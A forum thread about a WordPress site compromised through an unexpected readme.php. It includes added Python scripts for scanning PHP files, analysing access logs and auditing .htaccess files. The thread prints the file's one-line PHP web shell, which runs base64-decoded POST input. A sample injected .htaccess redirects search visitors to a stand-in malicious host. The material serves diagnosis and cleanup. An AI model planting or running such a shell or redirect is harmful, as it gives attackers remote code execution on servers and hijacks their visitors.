PHP Server Side Scripting Forum

    
What is readme.php?
vphoner
msg:4335477, 12:34 am on Jul 6, 2011 (gmt 0)

On a wordpress site, I checked past backups and there was no readme.php file. In June, one suddenly appeared and there are a lot of accesses to that file according to my log file.

Here is what is in the file:

<? @eval(base64_decode($_POST['evl']));@require_once('/tmp/sessionbroker.php'); ?>

Any idea what this file is doing, and why it's one of the most-hit files according to my log file?

When I access it, I just get a blank page.

Maybe a coincidence, but the day after this appeared my traffic dropped substantially on google.

 

vphoner
msg:4335483, 12:46 am on Jul 6, 2011 (gmt 0)

I can add that it appears that the referring urls (calling readme.php) are pages within my site that are calling the readme.php. Very strange. I have searched and there are no readme.php calls or links on any of my pages. Even searched the SQL database.

penders
msg:4335836, 4:22 pm on Jul 6, 2011 (gmt 0)

It certainly looks like your site has been hacked. I would delete readme.php immediately and patch up your WordPress install if applicable.

@eval(base64_decode($_POST['evl']));


This line allows anyone to pass any PHP code to your server (encoded as part of the POST data) and execute it ON YOUR SERVER! This could do pretty much anything! 'evl' looks a lot like 'evil' to me!

Once the hackers have been able to hack your site, they could be using this script repeatedly, hence increase in traffic. It could be used to try and infect other sites, in which case your site has now become the source of the 'virus' which could explain why you dropped on Google!?
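The one-liner penders is describing is a generic PHP backdoor: whatever the client sends in the `evl` POST field is base64-decoded and executed, and the `@` suppresses any error that would reveal it. The scanner below is an added example (not code from this thread or from WordPress) that walks a document root and scores each PHP file on the indicators such shells share: `eval`, `base64_decode`, request superglobals, a `require` from `/tmp`, a short `<?` open tag, or a long base64 blob. The indicator weights and the three sample files it builds in a temporary directory are my own constructions; point `scan_tree()` at a real web root to use it.

```python
"""Scan a web root for PHP files that carry backdoor indicators.

Added example, not from the thread. The indicator list and weights are my
own heuristics, and the sample tree is constructed here so the script runs
offline; call scan_tree("/path/to/public_html") on a real site.
"""
import os
import re
import tempfile

# (name, pattern, weight). Weights are an assumption: no single match proves
# anything, but eval + base64_decode + request input in one file is a shell.
INDICATORS = [
    ("eval", re.compile(r"\beval\s*\("), 3),
    ("base64_decode", re.compile(r"\bbase64_decode\s*\("), 2),
    ("request_input", re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\b"), 1),
    ("decoder", re.compile(r"\b(gzinflate|gzuncompress|str_rot13)\s*\("), 2),
    ("command_exec", re.compile(r"\b(system|shell_exec|passthru|exec|popen|proc_open)\s*\("), 2),
    ("dynamic_code", re.compile(r"\b(assert|create_function)\s*\("), 2),
    ("preg_replace_e", re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/e['\"]"), 3),
    # a require/include from a world-writable directory outside the docroot
    ("include_outside_docroot",
     re.compile(r"\b(require|include)(_once)?\s*\(?\s*['\"]/(tmp|var/tmp|dev/shm)/"), 3),
    ("long_base64_blob", re.compile(r"[A-Za-z0-9+/]{200,}={0,2}"), 2),
    # "<?" without "php": only runs where short_open_tag is on, rare in real code
    ("short_open_tag", re.compile(r"<\?(?!php\b|=|xml)"), 1),
]
PHP_EXTS = (".php", ".phtml", ".php5", ".inc")


def scan_file(path):
    """Return (score, [indicator names]) for one file."""
    with open(path, "r", encoding="utf-8", errors="ignore") as fh:
        src = fh.read()
    hits = [name for name, rx, _ in INDICATORS if rx.search(src)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, hits


def scan_tree(root, threshold=4):
    """Walk root and return PHP files scoring >= threshold, highest first."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if not fn.lower().endswith(PHP_EXTS):
                continue
            path = os.path.join(dirpath, fn)
            score, hits = scan_file(path)
            if score >= threshold:
                findings.append({"path": path, "score": score, "hits": hits,
                                 "mtime": os.path.getmtime(path)})
    return sorted(findings, key=lambda f: f["score"], reverse=True)


# --- constructed sample tree (not a real site) ---------------------------
SHELL = "<? @eval(base64_decode($_POST['evl']));@require_once('/tmp/sessionbroker.php'); ?>"
OBFUSCATED = "<?php $k = '" + "QUFB" * 80 + "'; eval(gzinflate(base64_decode($k)));"
BENIGN = "<?php\ndefine('WP_USE_THEMES', true);\nrequire('./wp-blog-header.php');\n"


def build_sample_root():
    """Write the three sample files into a fresh temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="wpscan-")
    os.makedirs(os.path.join(root, "wp-content", "uploads"))
    samples = {
        "index.php": BENIGN,
        "readme.php": SHELL,
        os.path.join("wp-content", "uploads", "cache.php"): OBFUSCATED,
    }
    for rel, body in samples.items():
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for f in scan_tree(build_sample_root()):
        print(f["score"], os.path.basename(f["path"]), ", ".join(f["hits"]))
```

Treat the scores as a triage order, not a verdict: a theme that embeds a long base64 image scores 2 and is ignored, while the posted readme.php trips five indicators at once. Run it over the whole account, not only the WordPress directory, because the `require_once('/tmp/...')` in the shell shows the attacker is comfortable dropping files outside the document root.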

vphoner
msg:4335895, 5:40 pm on Jul 6, 2011 (gmt 0)

I replaced the readme.php with the "evil" code with a blank one and it has not been replaced by the evildoers. What other cleanup do I have to do? There is no call to readme.php in the code that I have searched or the database. Where could it be calling from? I notice that after every legitimate page is called, a readme.php is called. So it's being called internally.

After cleaning up, will Google naturally see that the bad code is gone when it reindexes readme.php, or do you have to contact them for reinclusion?

I couldn't believe it shut down the google clicks in only a day after infestation. I see no symptoms other than a lot of readme.php accesses.

penders
msg:4335956, 7:33 pm on Jul 6, 2011 (gmt 0)

There is no call to readme.php in the code that I have searched or the database. Where could it be calling from? I notice that after every legitimate page is called, a readme.php is called. So its being called internally.


It is not necessarily being called internally. Any external site could be making the (initial) request, and requesting the legitimate pages, and faking the referrer to make it look like it is being called internally. Once called the script could even be calling itself?!

@require_once('/tmp/sessionbroker.php');


Do you have a sessionbroker.php file? (This is outside of your document root - public html folder.) Is this a hacked file (which I suspect) or part of WordPress? Is the date/time of this file the same as readme.php?

I think Google will naturally reindex your site over time. You could check in Google's Webmaster Tools for any info.

Other cleanup... Well, they got in somehow, so you should change your passwords and update your WordPress installation as necessary.
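The referrer point above is worth seeing in the logs themselves. The script below is an added example, not part of penders' post and not the site's real log: it parses Apache combined-format lines (the six sample lines, IPs and hostname are constructed), pulls every hit on readme.php, splits them by method and client, and records which request the same client made in the seconds before each hit. The Referer value is whatever the client chose to send, so a referrer pointing at one of your own posts only tells you the client wanted it to look that way.

```python
"""Correlate access-log hits on readme.php with the requests before them.

Added example, not from the thread. SAMPLE_LOG is constructed (Apache
combined format, RFC 5737 test addresses); on a real server use
parse_log(open("/var/log/apache2/access.log")).
"""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

SAMPLE_LOG = """\
203.0.113.5 - - [06/Jul/2011:10:15:01 +0000] "GET /2011/06/some-post/ HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
203.0.113.5 - - [06/Jul/2011:10:15:03 +0000] "POST /readme.php HTTP/1.1" 200 0 "http://www.example.com/2011/06/some-post/" "Mozilla/5.0"
198.51.100.9 - - [06/Jul/2011:10:20:44 +0000] "GET /2011/06/other-post/ HTTP/1.1" 200 7430 "http://www.google.com/search?q=x" "Mozilla/5.0"
198.51.100.9 - - [06/Jul/2011:10:20:45 +0000] "GET /readme.php HTTP/1.1" 200 0 "http://www.example.com/2011/06/other-post/" "Mozilla/5.0"
192.0.2.77 - - [06/Jul/2011:11:02:10 +0000] "GET /tag/php/ HTTP/1.1" 200 5210 "-" "Mozilla/5.0"
203.0.113.5 - - [06/Jul/2011:11:30:00 +0000] "POST /readme.php HTTP/1.1" 200 0 "-" "python-requests/0.6"
"""


def parse_log(lines):
    """Parse combined-format lines into dicts with a timezone-aware 'ts'."""
    entries = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
        entries.append(e)
    return entries


def readme_hits(entries, target="/readme.php", window=timedelta(seconds=10)):
    """Per-client view of hits on target, with the request each client made
    just before it (same IP, within window). Entries must be in log order."""
    last_seen = {}  # ip -> most recent entry from that client
    by_ip = defaultdict(lambda: {"hits": 0, "methods": Counter(),
                                 "referers": set(), "preceded_by": []})
    by_method = Counter()
    for e in entries:
        if e["path"].split("?")[0] != target:
            last_seen[e["ip"]] = e
            continue
        rec = by_ip[e["ip"]]
        rec["hits"] += 1
        rec["methods"][e["method"]] += 1
        by_method[e["method"]] += 1
        if e["referer"] != "-":
            rec["referers"].add(e["referer"])
        prev = last_seen.get(e["ip"])
        if prev is not None and e["ts"] - prev["ts"] <= window:
            rec["preceded_by"].append(prev["path"])
        last_seen[e["ip"]] = e
    return {"total": sum(by_method.values()), "by_method": by_method,
            "by_ip": dict(by_ip)}


def internal_referers(report, host):
    """Referers on target hits that claim one of our own pages. The header is
    client-supplied, so this proves nothing about links on the site."""
    own = set()
    for rec in report["by_ip"].values():
        own.update(r for r in rec["referers"] if urlparse(r).netloc == host)
    return own


if __name__ == "__main__":
    report = readme_hits(parse_log(SAMPLE_LOG.splitlines()))
    print(report["total"], "hits:", dict(report["by_method"]))
    for ip, rec in report["by_ip"].items():
        print(ip, rec["hits"], dict(rec["methods"]), rec["preceded_by"])
    print("claimed internal referers:", internal_referers(report, "www.example.com"))
```

Two things to look at in the output. POST hits are the shell being driven (a GET, like the OP's own test, just returns a blank page); a User-Agent such as a scripting library on those POSTs is a strong tell. And a client that fetches a post and then readme.php two seconds later with a Referer naming that post is exactly what a scanner that scrapes your post URLs and then calls the backdoor looks like, which is the scenario penders raises.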

vphoner
msg:4336761, 4:11 am on Jul 8, 2011 (gmt 0)

I did notice that according to the paths in my log file, only WordPress posts get the readme.php called after they load. Pages or tag pages do not get the call to readme.php. I don't have a sessionbroker.php (searched for it). The strange thing is that I see no changes on the site or hidden links/spam. Nothing that I can see. Checked the source code of many pages using the browser's "view source" window.

lexipixel
msg:4336763, 4:27 am on Jul 8, 2011 (gmt 0)

You've DEFINITELY been hacked... Chances are the code has spread to other files on your server.

See: [webmasterworld.com...]

lucy24
msg:4336776, 5:27 am on Jul 8, 2011 (gmt 0)

Do WordPress people and PHP people simply not talk to each other? The OP's two threads have taken off in entirely different directions :)

[webmasterworld.com...]

g1smd
msg:4336815, 7:39 am on Jul 8, 2011 (gmt 0)

Normally, cross-posting a question wastes everyone's time. This is the first time in a decade of forum usage that I have seen something useful come of it. :)

penders
msg:4336918, 1:25 pm on Jul 8, 2011 (gmt 0)

The OP's two threads have taken off in entirely different directions...


Are they really so different? Both agree the site has been hacked.

Although the site might have been hacked via a WordPress vulnerability, this type of hack looks fairly generic and similar hacks could happen to any site that has security vulnerabilities.

<? @eval(...


Interesting that this requires short_open_tag to be enabled on the server.

I did notice that that according to the paths in my log file, only wordpress posts get the readme.php called after they load. Pages or tag pages do not get the call to readme.php.


Maybe WordPress post URLs are easier to gather? Or maybe that was all the hacker required? As mentioned, it could be that the external site is requesting both the WordPress post (having gathered the URLs?) and is then requesting readme.php. Or did you find that if YOU requested the WordPress post, YOU also requested readme.php? Must admit I'm struggling with the idea that readme.php could be requested as a result of a WordPress post being requested AND both URLs appear as individual requests in the logs AND nothing strange appears in the page source. However, there could be some kind of server-side redirect(?!) going on, which would indicate that some other files have also been compromised.

Check .htaccess for any additional code that might have been added. If other wordpress files have been compromised then "readme.php" might not appear as is; it could be encoded in some way which will make searching difficult.

vphoner
msg:4337272, 1:52 am on Jul 9, 2011 (gmt 0)

Yes, when anyone requests a wordpress post, it immediately requests the readme.php. I can see this using weblog analysis of the paths that each user takes, and the readme.php is the next file accessed by everyone that requests a post. I have replaced the readme.php with one without any code in it to protect my visitors.

I have searched through hundreds of files, both manually and by keyword, and have not been able to find any malicious code, although I may not know what to look for. Which .htaccess should I look at, the root directory one, or others that are in other folders? What would I find? A redirect to an external URL?

lexipixel
msg:4337300, 4:50 am on Jul 9, 2011 (gmt 0)

Which .htaccess should I look at, the root directory one, or others that are in other folders? What would I find? A redirect to an external URL?


If your site is on a shared host, and you are not skilled at searching from a prompt, I would ask the hosting company to look it over -- there is a chance you are spreading something to visitors -- and also a chance that the server has been compromised.

penders
msg:4337351, 11:07 am on Jul 9, 2011 (gmt 0)

Which .htaccess should I look at, the root directory one, or others that are in other folders?


Do you have many .htaccess files?! Check the dates of these files - were any updated at the time readme.php appeared? Any .htaccess file that is 'above' the URL you are accessing could be affecting you. (Ideally you should only really have 1 .htaccess file in the root directory as otherwise the site can become harder to maintain.)

You could also check the request/response headers using a browser extension such as Live HTTP Headers for Firefox, which should show any redirection that might be happening.
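The two checks penders suggests here, reading every .htaccess above the affected URLs and comparing modification times against readme.php, can be scripted so nothing is missed. The following is an added example, not from the thread: it flags the .htaccess directives that commonly get injected (`auto_prepend_file`, rewrites or redirects to an external URL, `RewriteCond` tests on the referrer or user agent for search engines, a PHP handler on image extensions) and lists every file whose mtime falls within a window of the backdoor's. The sample tree, its timestamps and the `malicious.example` host are constructed for the run; on a real site pass the document root and the relative path of the suspicious file.

```python
"""Audit .htaccess files for injected directives and list files changed
around the time the backdoor appeared.

Added example, not from the thread. The directive patterns are my own
checks; the sample tree, timestamps and host names are constructed here.
"""
import os
import re
import tempfile
import time

SUSPICIOUS = [
    ("auto_prepend/append",
     re.compile(r"^\s*php_(value|admin_value)\s+auto_(prepend|append)_file\b", re.I | re.M)),
    ("redirect to external URL",
     re.compile(r"^\s*(Redirect(Match)?|RewriteRule)\s+.*\bhttps?://", re.I | re.M)),
    ("condition on crawler/referrer",
     re.compile(r"^\s*RewriteCond\s+%\{HTTP_(USER_AGENT|REFERER)\}.*\b(google|bing|yahoo|bot)\b",
                re.I | re.M)),
    ("ErrorDocument to URL",
     re.compile(r"^\s*ErrorDocument\s+\d{3}\s+https?://", re.I | re.M)),
    ("PHP handler for non-PHP extension",
     re.compile(r"^\s*(AddHandler|AddType|SetHandler)\s+\S*php\S*\s+\.(jpg|jpeg|png|gif|txt|ico|html?)\b",
                re.I | re.M)),
]


def audit_htaccess(root):
    """Every .htaccess under root that matches at least one SUSPICIOUS rule."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        if ".htaccess" not in filenames:
            continue
        path = os.path.join(dirpath, ".htaccess")
        with open(path, encoding="utf-8", errors="ignore") as fh:
            text = fh.read()
        hits = [name for name, rx in SUSPICIOUS if rx.search(text)]
        if hits:
            findings.append({"path": path, "hits": hits, "mtime": os.path.getmtime(path)})
    return findings


def files_modified_near(root, reference_rel, window=3 * 86400):
    """Relative paths of files whose mtime lies within `window` seconds of the
    reference file's mtime (the reference itself is excluded)."""
    reference = os.path.join(root, reference_rel)
    ref_mtime = os.path.getmtime(reference)
    out = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            if os.path.samefile(path, reference):
                continue
            if abs(os.path.getmtime(path) - ref_mtime) <= window:
                out.append(os.path.relpath(path, root))
    return sorted(out)


# --- constructed sample tree ---------------------------------------------
WP_HTACCESS = """# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
"""
INJECTED_HTACCESS = """RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|bing|yahoo) [NC]
RewriteRule ^(.*)$ http://malicious.example/go.php?$1 [R=302,L]
"""


def build_sample_root():
    """Old legitimate files, then a backdoor and two companions dropped 20 days ago."""
    root = tempfile.mkdtemp(prefix="htaudit-")
    now, day = time.time(), 86400
    files = {
        ".htaccess": (WP_HTACCESS, now - 400 * day),
        "index.php": ("<?php require('./wp-blog-header.php');\n", now - 400 * day),
        "readme.php": ("<? @eval(base64_decode($_POST['evl'])); ?>", now - 20 * day),
        os.path.join("wp-content", "uploads", ".htaccess"): (INJECTED_HTACCESS, now - 20 * day + 60),
        os.path.join("wp-includes", "class-cache.php"): ("<?php /* dropped alongside */", now - 20 * day - 3600),
    }
    for rel, (body, mtime) in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
        os.utime(path, (mtime, mtime))
    return root


if __name__ == "__main__":
    root = build_sample_root()
    for f in audit_htaccess(root):
        print(os.path.relpath(f["path"], root), f["hits"])
    print(files_modified_near(root, "readme.php"))
```

A referrer-conditioned redirect like the injected one explains the OP's symptoms well: visitors arriving from a search result are bounced elsewhere while the site owner, typing the URL directly, sees a clean page and clean source. Attackers can also reset mtimes, so an empty "modified near" list is not a clean bill; a hit in it is worth opening. For the header check, `curl -sD - -o /dev/null` against a post URL with a forged `-e 'http://www.google.com/'` referrer shows any 302 and `Location` the browser would follow.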

© Webmaster World 1996-2014 all rights reserved